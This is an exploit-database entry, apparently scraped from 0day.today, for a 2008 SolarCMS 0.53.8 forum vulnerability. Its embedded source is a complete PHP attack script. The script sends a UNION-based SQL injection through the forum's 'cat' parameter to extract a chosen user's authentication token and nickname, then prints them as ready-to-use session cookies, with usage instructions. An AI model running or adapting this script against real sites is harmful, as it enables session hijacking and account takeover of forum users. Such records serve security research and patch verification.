Description
Exploit for unknown platform in category web applications
{"id": "1337DAY-ID-4523", "type": "zdt", "bulletinFamily": "exploit", "title": "SolarCMS 0.53.8 (Forum) Remote Cookies Disclosure Exploit", "description": "Exploit for unknown platform in category web applications", "published": "2008-12-22T00:00:00", "modified": "2008-12-22T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/4523", "reporter": "StAkeR", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-03-06T21:06:47", "viewCount": 5, "enchantments": {"score": {"value": -0.3, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.3}, "sourceHref": "https://0day.today/exploit/4523", "sourceData": "=========================================================\r\nSolarCMS 0.53.8 (Forum) Remote Cookies Disclosure Exploit\r\n=========================================================\r\n\r\n\r\n<?php\r\n\r\nerror_reporting(0);\r\n\r\n/***************************************************************\r\n * --------------------------------------------------------- * \r\n * SolarCMS 0.53.8 (Forum) Remote Cookies Disclosure Exploit *\r\n * --------------------------------------------------------- *\r\n * download on http://cms.maury91.org/ *\r\n * works regardless PHP.ini settings * \r\n * --------------------------------------------------------- *\r\n ***************************************************************/\r\n\r\n\r\nlist($file,$host,$path,$myid,$table) = $argv;\r\n\r\nif($argc != 5) usage();\r\n\r\n$cookie = (preg_match('/\\^(.+?)\\^/',get_cookies(),$out)) ? explode(':',$out[1]) : error();\r\n\r\nif($path == '/')\r\n{\r\n print \"_nick={$cookie[1]}; path=/;\\n\";\r\n print \"_sauth={$cookie[0]}; path=/;\\n\";\r\n exit;\r\n} \r\nelse\r\n{\r\n print \"/{$path}_nick={$cookie[1]}; path=/;\\n\";\r\n print \"/{$path}_sauth={$cookie[0]}; path=/;\\n\";\r\n exit;\r\n} \r\n \r\n \r\n \r\n\r\nfunction get_cookies()\r\n{\r\n global $host,$path,$myid,$table;\r\n \r\n $data .= \"GET {$path}/index.php?com=Forum&cat=-1+union+select+1,\";\r\n $data .= \"concat(0x5e,sauth,0x3a,nick,0x5e),3+from+{$table}+where+id={$myid}-- HTTP/1.1\\r\\n\";\r\n $data .= \"Host: {$host}\\r\\n\";\r\n $data .= \"User-Agent: Mozilla/4.5 [en] (Win95; U)\\r\\n\";\r\n $data .= \"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n\";\r\n $data .= \"Connection: close\\r\\n\\r\\n\";\r\n\r\n \r\n \r\n if(!$sock = fsockopen($host,80)) die(\"connection refused\\n\");\r\n \r\n fputs($sock,$data);\r\n \r\n while(!feof($sock))\r\n {\r\n $html .= fgets($sock);\r\n } \r\n \r\n fclose($sock);\r\n return $html;\r\n} \r\n\r\n\r\n \r\nfunction error()\r\n{\r\n print \"Exploit Failed!\\n\";\r\n print \"Regards ;)\\n\";\r\n exit;\r\n}\r\n\r\nfunction usage()\r\n{\r\n print \"---------------------------------------------------------\\n\"; \r\n print \"SolarCMS 0.53.8 (Forum) Remote Cookies Disclosure Exploit\\n\";\r\n print \"---------------------------------------------------------\\n\";\r\n print \"Usage: php xpl.php [host] [path] [userid] [table]\\n\";\r\n print \"php xpl.php localhost / 1 solarcms_users\\n\";\r\n exit;\r\n\r\n}\r\n\r\n\r\n\n# 0day.today [2018-03-06] #", "_state": {"dependencies": 1646598484}}
{}